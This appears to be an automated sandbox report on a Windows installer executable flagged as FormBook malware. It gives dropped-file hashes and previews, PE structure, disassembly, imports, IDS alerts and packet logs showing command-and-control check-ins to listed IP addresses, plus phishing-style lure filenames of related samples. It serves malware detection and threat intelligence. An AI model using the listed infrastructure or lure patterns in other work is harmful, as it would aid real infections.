                                                                            Cobro Juridico_0420198202_326828_4985792583130360_300690_8122300886764676459_5190713730838_pdf.exeGet hashmaliciousBrowse
                                                                            • 172.67.222.176
                                                                            Payment Slip.docGet hashmaliciousBrowse
                                                                            • 104.21.17.57
                                                                            Cobro Juridico_0291662728_7023446_452487041454723_016698_5192136884256735776_2301761820735_pdf.exeGet hashmaliciousBrowse
                                                                            • 104.21.17.57
                                                                            INQUIRY 1820521 pdf.exeGet hashmaliciousBrowse
                                                                            • 104.21.82.58
                                                                            PaymentCopy.vbsGet hashmaliciousBrowse
                                                                            • 172.67.222.131
                                                                            PAYMENT COPY.exeGet hashmaliciousBrowse
                                                                            • 104.21.28.135
                                                                            PO NUMBER 3120386 3120393 SIGNED.exeGet hashmaliciousBrowse
                                                                            • 1.2.3.4
                                                                            Cobro Juridico_07223243630_5643594_539661009070075_49874359_5059639084170590400_7272781644_pdf.exeGet hashmaliciousBrowse
                                                                            • 172.67.222.176
                                                                            BL2659618800638119374.xls.exeGet hashmaliciousBrowse
                                                                            • 172.67.222.176
                                                                            Purchase order and quote confirmation.exeGet hashmaliciousBrowse
                                                                            • 172.67.222.176
                                                                            Confirm Order for SK TRIMS & INDUSTRIES_DK4571,pdf.exeGet hashmaliciousBrowse
                                                                            • 172.67.188.154
                                                                            Re Confirm#U00ffthe invoice#U00ffthe payment slip.exeGet hashmaliciousBrowse
                                                                            • 104.21.17.57
                                                                            SOA.exeGet hashmaliciousBrowse
                                                                            • 104.21.19.200
                                                                            RFQ No A'4762GHTECHNICAL DETAILS.exeGet hashmaliciousBrowse
                                                                            • 104.21.19.200
                                                                            GQ5JvPEI6c.exeGet hashmaliciousBrowse
                                                                            • 104.21.17.57
                                                                            setupapp.exeGet hashmaliciousBrowse
                                                                            • 172.67.164.1
                                                                            g2qwgG2xbe.exeGet hashmaliciousBrowse
                                                                            • 172.67.161.4
                                                                            C++ Dropper.exeGet hashmaliciousBrowse
                                                                            • 104.21.50.92

                                                                            JA3 Fingerprints

                                                                            No context

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Temp\kujd8v16w3b9lgr
                                                                            Process:C:\Users\user\Desktop\NdBLyH2h5d.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):164864
                                                                            Entropy (8bit):7.998914918090413
                                                                            Encrypted:true
                                                                            SSDEEP:3072:mtsl0UDwDZ6jnJ+vmebKkjgiuK5svdujBO1niLCA0RvNbBorABqGMWt9:medJjkvxKvMCA0TirvGL
                                                                            MD5:E83FC0EE2B9E83A097B116CB29EF1959
                                                                            SHA1:89B3F8182EC630FE17642466E446D39CE6BE5315
                                                                            SHA-256:0049A5567B1B77E56ED32450A5531B2DC76B852CE760BA10ADA60CE9E71375A0
                                                                            SHA-512:EE14F870316B77B8D6FBF8366171B11B39B08B34F4703C6240C90E08956C56AD8C80CB09C3D1832F965C5445AA4F0E30652FF312610EEBF7DC3B881EC512FD6C
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview: ..,......\....e..T/b..."f...&{...q=....}]lw2..k^..xt..9v~6)N.._......u..W.M.........[<2.".J..J...@.T..&....Z..Q.....NF..Q.&.|.8z?..........|.3.....U.I{FD.m*......<F...Ge.....E....'1...D7..l.{.O4..T.]....B.d1.J..'u..nh...`MP..b....B.7.E.o..q?....;.. ...X7.!.z}m%..~@........\..?G..s......B.Y._.(s7J@..q.B.I0.....b;.......{<...9sR......,...:.m....U.d.L..FQ....t/.!lxX....\Hw....)w..B..?.+h.l........1.R.i..DBB.pz.^"......g.,.hE.....{..."...a..[6{......Y.?:....{.vZ ...9...$....t>....u..I.t.&.I.......G\(...q..{...:}....T........._.$...6..........6"&......0;....c._+.....-.,......T&...G..c...t.:j.(e.......r.u}...%D...h...?rB.N%?.....u....._Z....9.x...,..N:+>...H.C..,#.L...mUM...e..^.r.....&..2.b!. .h....W.+...<v.X.*./bz...b.....70....P._...x.\.. ....`.....E.|...p+......T.. .~<.\/s.....N8:...2...2:c...j(..:.Q"...O..@..r.pn.~....f<.$}..z..Esl....}:]....MS..3.....U*e,.~..1.(.59..L...W.....B>l........V...&..n+.8...z.....A./....W..E.....O.......]....V.I...N..`'..h
                                                                            C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll
                                                                            Process:C:\Users\user\Desktop\NdBLyH2h5d.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):5632
                                                                            Entropy (8bit):4.076385816391399
                                                                            Encrypted:false
                                                                            SSDEEP:48:a97y+GI2M5gcWZhfChEsHIGmEsH/Gt4BKiZ/seNkTHfav6yYZmEeSRuqSiMy:1QOj4IGN4/GCBKxfQKuixv
                                                                            MD5:C9336787DFDAFEB728B854D5B0137027
                                                                            SHA1:DF3AD91DA915FD81FDA8238B49DA7F8428CD68F9
                                                                            SHA-256:2FD494E3A53E62F5E4658D2DDD0AE20647933F7ACB0CC0E7DC834CA128AB6D7F
                                                                            SHA-512:68683812E8B0BF21295C9B475B4A4D2207ADA6A1994E8409005B2B27668889D042E8D718E3DCC73D316316736888C7E93B101CA502A3B4B977136D16328431EB
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........5K..fK..fK..f_..gZ..fK..fw..f...gJ..f...gJ..f..{fJ..f...gJ..fRichK..f........................PE..L....s`...........!......................... ...............................`............@.........................@ ..P....1.......@.......................P...... ...............................................0...............................code... ........................... ....data...l.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                            C:\Users\user\AppData\Local\Temp\ur15t24pnyduhs
                                                                            Process:C:\Users\user\Desktop\NdBLyH2h5d.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):6661
                                                                            Entropy (8bit):7.961933784328945
                                                                            Encrypted:false
                                                                            SSDEEP:192:AwW3PWDSp3fuLJLNdsgASFuwS+h0F5xlkeKHP:3tO6Tr4wSc0F5XkfP
                                                                            MD5:52F75799779AB035150433B39CE1013C
                                                                            SHA1:7845564CC833DF8A37F6B1603481F036C23EB633
                                                                            SHA-256:9CD94A2C53E7C3CA35926F96E1F45833C6841E4AF5335B65A5E16D504A074AB6
                                                                            SHA-512:6D58364D5D9949427D7C66A38BB9840576E2446D30E74B4C19C42A95A14C9B45DDB474257E4D00D43BA2EDD6F69A341EB2AE11ACDE558877F898B6CB8C505521
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview: .u*...kf..w`.L.b.P..^2vB:[..?..I...&..o...:.^|Z.mE.ze.lN.x.M.+...@.....$s.....In.~*..p.e.'a..........|.0e....AT.0...vQ.....?.(Ij&i...p.e..q..K.....K).]...3..T.....bA...!.K.P..J..f+..f.&H.....)....v...j..A.*.M..........T\.e8..}..}B.$....i.B.d.}.Q...U7.5.D9....s.....]..C.n......r..'..A....gD...5.^.O..W}..g}p.2n..B.(p=..9...V.k..;a...Z.{\.....BI[:.S..i..T....X.>c._....:.Z.6..'.y.)%&Gd...Y.Lo.v..z..c.......E....7....J.dJ.[.fy.......(8A....+..L.....2&O..c.|U.r8...-..u hX/9h._ i..8't...m,~.....^q....r.-?......5%.../`6..C...T-l.....Z$..E...T.lOQ6.+$.B..V..3-U....q..X..R..-;S.Be..p.hP{..+.r...N2T..;.R6....`.3.~...(IG...tVx1[......Dec.W.-L...Cv"......_.bA/...5..X..w.K.....9/K.i$=.o-8A..;..!..b1s.3H.w$..{.^h........d.kv.Mz+.N^.u..5.7.X_.....r.A+...B.....:[..?....$C.&vw0.j5......d.........2..z..WZ..n...._yF<...n..+.S.Ce...I.{\.6.....{Z..h_.}C[X..g-.Q0!....D.Ij...(G.z.d.q.....}.B8..Lo....3[.V.>..$L...TW..2.I.7y......F....T.z.....x......Q..3.du..*.)..

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                            Entropy (8bit):7.904825034789928
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                            • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:NdBLyH2h5d.exe
                                                                            File size:207111
                                                                            MD5:3fef6985af0d52ab6701df170096b504
                                                                            SHA1:ac8db3220c960262f8e666eae676066cec541b3a
                                                                            SHA256:a9c3d37d324e9b6a0ebf9f9369c68cc288117edc4657d086b0fbc0cbafee9e64
                                                                            SHA512:e2cfc5465a281dbe65152d21e6a1250559e042c59eb8c313a4cae8c4846fb5e998f83d74e97122ba01c63dd10c052a1c6137c85dfe6f6abd9f7894d8811319c4
                                                                            SSDEEP:3072:HyewmN4skJ6VtZmtsl0UDwDZ6jnJ+vmebKkjgiuK5svdujBO1niLCA0RvNbBorAC:HddmedJjkvxKvMCA0TirvG6t
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....9.....J1.....

                                                                            File Icon

                                                                            Icon Hash:b2a88c96b2ca6a72

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x40314a
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                            DLL Characteristics:
                                                                            Time Stamp:0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            sub esp, 0000017Ch
                                                                            push ebx
                                                                            push ebp
                                                                            push esi
                                                                            xor esi, esi
                                                                            push edi
                                                                            mov dword ptr [esp+18h], esi
                                                                            mov ebp, 00409240h
                                                                            mov byte ptr [esp+10h], 00000020h
                                                                            call dword ptr [00407030h]
                                                                            push esi
                                                                            call dword ptr [00407270h]
                                                                            mov dword ptr [007A3030h], eax
                                                                            push esi
                                                                            lea eax, dword ptr [esp+30h]
                                                                            push 00000160h
                                                                            push eax
                                                                            push esi
                                                                            push 0079E540h
                                                                            call dword ptr [00407158h]
                                                                            push 00409230h
                                                                            push 007A2780h
                                                                            call 00007FF688C03BD8h
                                                                            mov ebx, 007AA400h
                                                                            push ebx
                                                                            push 00000400h
                                                                            call dword ptr [004070B4h]
                                                                            call 00007FF688C01319h
                                                                            test eax, eax
                                                                            jne 00007FF688C013D6h
                                                                            push 000003FBh
                                                                            push ebx
                                                                            call dword ptr [004070B0h]
                                                                            push 00409228h
                                                                            push ebx
                                                                            call 00007FF688C03BC3h
                                                                            call 00007FF688C012F9h
                                                                            test eax, eax
                                                                            je 00007FF688C014F2h
                                                                            mov edi, 007A9000h
                                                                            push edi
                                                                            call dword ptr [00407140h]
                                                                            call dword ptr [004070ACh]
                                                                            push eax
                                                                            push edi
                                                                            call 00007FF688C03B81h
                                                                            push 00000000h
                                                                            call dword ptr [00407108h]
                                                                            cmp byte ptr [007A9000h], 00000022h
                                                                            mov dword ptr [007A2F80h], eax
                                                                            mov eax, edi
                                                                            jne 00007FF688C013BCh
                                                                            mov byte ptr [esp+10h], 00000022h
                                                                            mov eax, 00000001h

                                                                            Rich Headers

                                                                            Programming Language:
                                                                            • [EXP] VC++ 6.0 SP5 build 8804

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x73440xb4.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3ac0000x900.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x59de0x5a00False0.681293402778data6.5143386598IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x70000x10f20x1200False0.430338541667data5.0554281206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0x90000x39a0340x400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                            .ndata0x3a40000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .rsrc0x3ac0000x9000xa00False0.409375data3.94574916515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountry
                                                                            RT_ICON0x3ac1900x2e8dataEnglishUnited States
                                                                            RT_DIALOG0x3ac4780x100dataEnglishUnited States
                                                                            RT_DIALOG0x3ac5780x11cdataEnglishUnited States
                                                                            RT_DIALOG0x3ac6980x60dataEnglishUnited States
                                                                            RT_GROUP_ICON0x3ac6f80x14dataEnglishUnited States
                                                                            RT_MANIFEST0x3ac7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                            Imports

                                                                            DLLImport
                                                                            KERNEL32.dllCloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                                                            USER32.dllScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                            GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                            SHELL32.dllSHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                            ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                            COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                            ole32.dllOleInitialize, OleUninitialize, CoCreateInstance
                                                                            VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                            Possible Origin

                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishUnited States

                                                                            Network Behavior

                                                                            Snort IDS Alerts

                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                            04/12/21-10:06:12.886360TCP1201ATTACK-RESPONSES 403 Forbidden804970934.102.136.180192.168.2.3
                                                                            04/12/21-10:06:24.103583TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971380192.168.2.352.15.160.167
                                                                            04/12/21-10:06:24.103583TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971380192.168.2.352.15.160.167
                                                                            04/12/21-10:06:24.103583TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971380192.168.2.352.15.160.167
                                                                            04/12/21-10:06:39.648039TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971880192.168.2.3213.171.195.105
                                                                            04/12/21-10:06:39.648039TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971880192.168.2.3213.171.195.105
                                                                            04/12/21-10:06:39.648039TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971880192.168.2.3213.171.195.105
                                                                            04/12/21-10:06:56.074540TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972580192.168.2.323.227.38.74
                                                                            04/12/21-10:06:56.074540TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972580192.168.2.323.227.38.74
                                                                            04/12/21-10:06:56.074540TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972580192.168.2.323.227.38.74
                                                                            04/12/21-10:06:56.251104TCP1201ATTACK-RESPONSES 403 Forbidden804972523.227.38.74192.168.2.3
                                                                            04/12/21-10:07:06.602644TCP1201ATTACK-RESPONSES 403 Forbidden8049726185.253.212.22192.168.2.3
                                                                            04/12/21-10:07:23.705914TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973380192.168.2.3184.168.131.241
                                                                            04/12/21-10:07:23.705914TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973380192.168.2.3184.168.131.241
                                                                            04/12/21-10:07:23.705914TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973380192.168.2.3184.168.131.241
                                                                            04/12/21-10:07:34.592023TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973580192.168.2.3104.21.24.135
                                                                            04/12/21-10:07:34.592023TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973580192.168.2.3104.21.24.135
                                                                            04/12/21-10:07:34.592023TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973580192.168.2.3104.21.24.135
                                                                            04/12/21-10:07:39.845866TCP1201ATTACK-RESPONSES 403 Forbidden804973634.102.136.180192.168.2.3

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Apr 12, 2021 10:06:12.700453043 CEST4970980192.168.2.334.102.136.180
                                                                            Apr 12, 2021 10:06:12.742374897 CEST804970934.102.136.180192.168.2.3
                                                                            Apr 12, 2021 10:06:12.742485046 CEST4970980192.168.2.334.102.136.180
                                                                            Apr 12, 2021 10:06:12.742605925 CEST4970980192.168.2.334.102.136.180
                                                                            Apr 12, 2021 10:06:12.786351919 CEST804970934.102.136.180192.168.2.3
                                                                            Apr 12, 2021 10:06:12.886359930 CEST804970934.102.136.180192.168.2.3
                                                                            Apr 12, 2021 10:06:12.886396885 CEST804970934.102.136.180192.168.2.3
                                                                            Apr 12, 2021 10:06:12.886513948 CEST4970980192.168.2.334.102.136.180
                                                                            Apr 12, 2021 10:06:12.886676073 CEST4970980192.168.2.334.102.136.180
                                                                            Apr 12, 2021 10:06:12.930332899 CEST804970934.102.136.180192.168.2.3
                                                                            Apr 12, 2021 10:06:17.975327015 CEST4971180192.168.2.3184.168.131.241
                                                                            Apr 12, 2021 10:06:18.179218054 CEST8049711184.168.131.241192.168.2.3
                                                                            Apr 12, 2021 10:06:18.181422949 CEST4971180192.168.2.3184.168.131.241
                                                                            Apr 12, 2021 10:06:18.181508064 CEST4971180192.168.2.3184.168.131.241
                                                                            Apr 12, 2021 10:06:18.385077000 CEST8049711184.168.131.241192.168.2.3
                                                                            Apr 12, 2021 10:06:18.420839071 CEST8049711184.168.131.241192.168.2.3
                                                                            Apr 12, 2021 10:06:18.420866966 CEST8049711184.168.131.241192.168.2.3
                                                                            Apr 12, 2021 10:06:18.421087027 CEST4971180192.168.2.3184.168.131.241
                                                                            Apr 12, 2021 10:06:18.421169043 CEST4971180192.168.2.3184.168.131.241
                                                                            Apr 12, 2021 10:06:18.624491930 CEST8049711184.168.131.241192.168.2.3
                                                                            Apr 12, 2021 10:06:23.963184118 CEST4971380192.168.2.352.15.160.167
                                                                            Apr 12, 2021 10:06:24.103296995 CEST804971352.15.160.167192.168.2.3
                                                                            Apr 12, 2021 10:06:24.103418112 CEST4971380192.168.2.352.15.160.167
                                                                            Apr 12, 2021 10:06:24.103583097 CEST4971380192.168.2.352.15.160.167
                                                                            Apr 12, 2021 10:06:24.240886927 CEST804971352.15.160.167192.168.2.3
                                                                            Apr 12, 2021 10:06:24.241137028 CEST804971352.15.160.167192.168.2.3
                                                                            Apr 12, 2021 10:06:24.241153955 CEST804971352.15.160.167192.168.2.3
                                                                            Apr 12, 2021 10:06:24.241297960 CEST4971380192.168.2.352.15.160.167
                                                                            Apr 12, 2021 10:06:24.241328001 CEST4971380192.168.2.352.15.160.167
                                                                            Apr 12, 2021 10:06:24.383333921 CEST804971352.15.160.167192.168.2.3
                                                                            Apr 12, 2021 10:06:39.591603041 CEST4971880192.168.2.3213.171.195.105
                                                                            Apr 12, 2021 10:06:39.647742033 CEST8049718213.171.195.105192.168.2.3
                                                                            Apr 12, 2021 10:06:39.647850037 CEST4971880192.168.2.3213.171.195.105
                                                                            Apr 12, 2021 10:06:39.648039103 CEST4971880192.168.2.3213.171.195.105
                                                                            Apr 12, 2021 10:06:39.703845978 CEST8049718213.171.195.105192.168.2.3
                                                                            Apr 12, 2021 10:06:39.703871965 CEST8049718213.171.195.105192.168.2.3
                                                                            Apr 12, 2021 10:06:39.703888893 CEST8049718213.171.195.105192.168.2.3
                                                                            Apr 12, 2021 10:06:39.703958988 CEST8049718213.171.195.105192.168.2.3
                                                                            Apr 12, 2021 10:06:39.704070091 CEST4971880192.168.2.3213.171.195.105
                                                                            Apr 12, 2021 10:06:39.704123974 CEST4971880192.168.2.3213.171.195.105
                                                                            Apr 12, 2021 10:06:39.704212904 CEST4971880192.168.2.3213.171.195.105
                                                                            Apr 12, 2021 10:06:45.028251886 CEST4972180192.168.2.3169.1.24.244
                                                                            Apr 12, 2021 10:06:45.261461020 CEST8049721169.1.24.244192.168.2.3
                                                                            Apr 12, 2021 10:06:45.261641979 CEST4972180192.168.2.3169.1.24.244
                                                                            Apr 12, 2021 10:06:45.261780977 CEST4972180192.168.2.3169.1.24.244
                                                                            Apr 12, 2021 10:06:45.496073008 CEST8049721169.1.24.244192.168.2.3
                                                                            Apr 12, 2021 10:06:45.496208906 CEST4972180192.168.2.3169.1.24.244
                                                                            Apr 12, 2021 10:06:45.496284008 CEST4972180192.168.2.3169.1.24.244
                                                                            Apr 12, 2021 10:06:45.720632076 CEST8049721169.1.24.244192.168.2.3
                                                                            Apr 12, 2021 10:06:50.677201033 CEST4972380192.168.2.3162.209.114.201
                                                                            Apr 12, 2021 10:06:50.800687075 CEST8049723162.209.114.201192.168.2.3
                                                                            Apr 12, 2021 10:06:50.801640987 CEST4972380192.168.2.3162.209.114.201
                                                                            Apr 12, 2021 10:06:50.801923037 CEST4972380192.168.2.3162.209.114.201
                                                                            Apr 12, 2021 10:06:50.925311089 CEST8049723162.209.114.201192.168.2.3
                                                                            Apr 12, 2021 10:06:50.927325964 CEST8049723162.209.114.201192.168.2.3
                                                                            Apr 12, 2021 10:06:50.927370071 CEST8049723162.209.114.201192.168.2.3
                                                                            Apr 12, 2021 10:06:50.927634954 CEST4972380192.168.2.3162.209.114.201
                                                                            Apr 12, 2021 10:06:50.927676916 CEST4972380192.168.2.3162.209.114.201
                                                                            Apr 12, 2021 10:06:51.051131964 CEST8049723162.209.114.201192.168.2.3
                                                                            Apr 12, 2021 10:06:56.031466961 CEST4972580192.168.2.323.227.38.74
                                                                            Apr 12, 2021 10:06:56.073962927 CEST804972523.227.38.74192.168.2.3
                                                                            Apr 12, 2021 10:06:56.074162960 CEST4972580192.168.2.323.227.38.74
                                                                            Apr 12, 2021 10:06:56.074539900 CEST4972580192.168.2.323.227.38.74
                                                                            Apr 12, 2021 10:06:56.116856098 CEST804972523.227.38.74192.168.2.3
                                                                            Apr 12, 2021 10:06:56.251104116 CEST804972523.227.38.74192.168.2.3
                                                                            Apr 12, 2021 10:06:56.251144886 CEST804972523.227.38.74192.168.2.3
                                                                            Apr 12, 2021 10:06:56.251162052 CEST804972523.227.38.74192.168.2.3
                                                                            Apr 12, 2021 10:06:56.251178026 CEST804972523.227.38.74192.168.2.3
                                                                            Apr 12, 2021 10:06:56.251194000 CEST804972523.227.38.74192.168.2.3
                                                                            Apr 12, 2021 10:06:56.251204967 CEST804972523.227.38.74192.168.2.3
                                                                            Apr 12, 2021 10:06:56.251220942 CEST804972523.227.38.74192.168.2.3
                                                                            Apr 12, 2021 10:06:56.251365900 CEST4972580192.168.2.323.227.38.74
                                                                            Apr 12, 2021 10:06:56.251424074 CEST4972580192.168.2.323.227.38.74
                                                                            Apr 12, 2021 10:06:56.251529932 CEST4972580192.168.2.323.227.38.74
                                                                            Apr 12, 2021 10:07:06.477828026 CEST4972680192.168.2.3185.253.212.22
                                                                            Apr 12, 2021 10:07:06.537234068 CEST8049726185.253.212.22192.168.2.3
                                                                            Apr 12, 2021 10:07:06.537369967 CEST4972680192.168.2.3185.253.212.22
                                                                            Apr 12, 2021 10:07:06.537733078 CEST4972680192.168.2.3185.253.212.22
                                                                            Apr 12, 2021 10:07:06.602602005 CEST8049726185.253.212.22192.168.2.3
                                                                            Apr 12, 2021 10:07:06.602643967 CEST8049726185.253.212.22192.168.2.3
                                                                            Apr 12, 2021 10:07:06.602660894 CEST8049726185.253.212.22192.168.2.3
                                                                            Apr 12, 2021 10:07:06.602829933 CEST4972680192.168.2.3185.253.212.22
                                                                            Apr 12, 2021 10:07:06.602936029 CEST4972680192.168.2.3185.253.212.22
                                                                            Apr 12, 2021 10:07:06.662379980 CEST8049726185.253.212.22192.168.2.3
                                                                            Apr 12, 2021 10:07:17.967724085 CEST4973280192.168.2.345.142.156.44
                                                                            Apr 12, 2021 10:07:18.187750101 CEST804973245.142.156.44192.168.2.3
                                                                            Apr 12, 2021 10:07:18.187925100 CEST4973280192.168.2.345.142.156.44
                                                                            Apr 12, 2021 10:07:18.188160896 CEST4973280192.168.2.345.142.156.44
                                                                            Apr 12, 2021 10:07:18.403793097 CEST804973245.142.156.44192.168.2.3
                                                                            Apr 12, 2021 10:07:18.403820038 CEST804973245.142.156.44192.168.2.3
                                                                            Apr 12, 2021 10:07:18.403829098 CEST804973245.142.156.44192.168.2.3
                                                                            Apr 12, 2021 10:07:18.406378984 CEST4973280192.168.2.345.142.156.44
                                                                            Apr 12, 2021 10:07:18.406563044 CEST4973280192.168.2.345.142.156.44
                                                                            Apr 12, 2021 10:07:18.622765064 CEST804973245.142.156.44192.168.2.3
                                                                            Apr 12, 2021 10:07:23.509421110 CEST4973380192.168.2.3184.168.131.241
                                                                            Apr 12, 2021 10:07:23.705492973 CEST8049733184.168.131.241192.168.2.3
                                                                            Apr 12, 2021 10:07:23.705681086 CEST4973380192.168.2.3184.168.131.241
                                                                            Apr 12, 2021 10:07:23.705914021 CEST4973380192.168.2.3184.168.131.241
                                                                            Apr 12, 2021 10:07:23.901904106 CEST8049733184.168.131.241192.168.2.3
                                                                            Apr 12, 2021 10:07:23.957165956 CEST8049733184.168.131.241192.168.2.3
                                                                            Apr 12, 2021 10:07:23.957191944 CEST8049733184.168.131.241192.168.2.3
                                                                            Apr 12, 2021 10:07:23.957551003 CEST4973380192.168.2.3184.168.131.241
                                                                            Apr 12, 2021 10:07:23.957688093 CEST4973380192.168.2.3184.168.131.241
